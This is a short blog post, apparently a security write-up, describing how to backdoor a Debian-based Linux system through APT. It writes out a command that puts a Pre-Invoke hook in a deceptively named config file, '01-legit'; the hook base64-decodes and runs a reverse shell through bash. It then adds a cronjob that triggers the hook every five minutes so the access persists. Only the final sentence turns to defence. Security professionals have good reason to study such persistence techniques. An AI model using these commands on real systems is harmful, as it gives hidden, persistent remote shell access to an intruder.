Creating a backdoor through APT sources

December 18, 2024

Backdoor through APT sources

Advanced Package Tool (APT) is widely used in Debian-based Linux distributions for handling the installation and removal of software packages. However, if the system is compromised, APT can become a vector for malicious activities. This blog post explores a proof of concept (PoC) demonstrating how an attacker can leverage APT sources to establish a backdoor on a system.

Overview and modifying APT sources

The concept revolves around injecting malicious commands into APT's configuration files and scheduling these commands to execute periodically. By doing so, an attacker can ensure persistent access to the compromised system, facilitating unauthorized shell access or other malicious operations.

Injecting the Pre-Invoke Command

echo 'APT::Update::Pre-Invoke {"echo "{base64_encoded_reverse_shell}" | base64 -d | bash"};' > /etc/apt/apt.conf.d/01-legit

Explanation:

  • echo 'APT::Update::Pre-Invoke {...}': This echoes the configuration directive to execute a command before apt update runs.
  • {"echo "{base64_encoded_reverse_shell}" | base64 -d | bash"}; This is the command that will be executed. It decodes the base64 encoded reverse shell and executes it.
  • > /etc/apt/apt.conf.d/01-legit: This redirects the output to the specified file. I chose 01-legit because it's the first file in the directory and it it now seems legit... When apt update is executed, the pre-invoke command decodes the base64-encoded reverse shell and executes it, thereby establishing a connection back to the attacker's system.

Ensuring Persistence with Cronjobs

To ensure the backdoor remains active even after a reboot, we need to add it to the system's crontab.

echo "*/5 * * * * apt update &" >> /etc/crontab

Explanation:

  • */5 * * * * apt update &: This schedules the apt update command to run every 5 minutes. Change the interval to your liking.
  • >> /etc/crontab: This appends the command to the crontab file.

This cronjob ensures that the backdoor is executed periodically, maintaining persistent access to the compromised system.

By injecting a pre-invoke command into APT's configuration and scheduling it to run periodically, an attacker can establish a backdoor on a system. This method leverages APT's configuration files to execute malicious commands, ensuring persistence and remote access. Be sure to check your APT sources list for any other malicious files.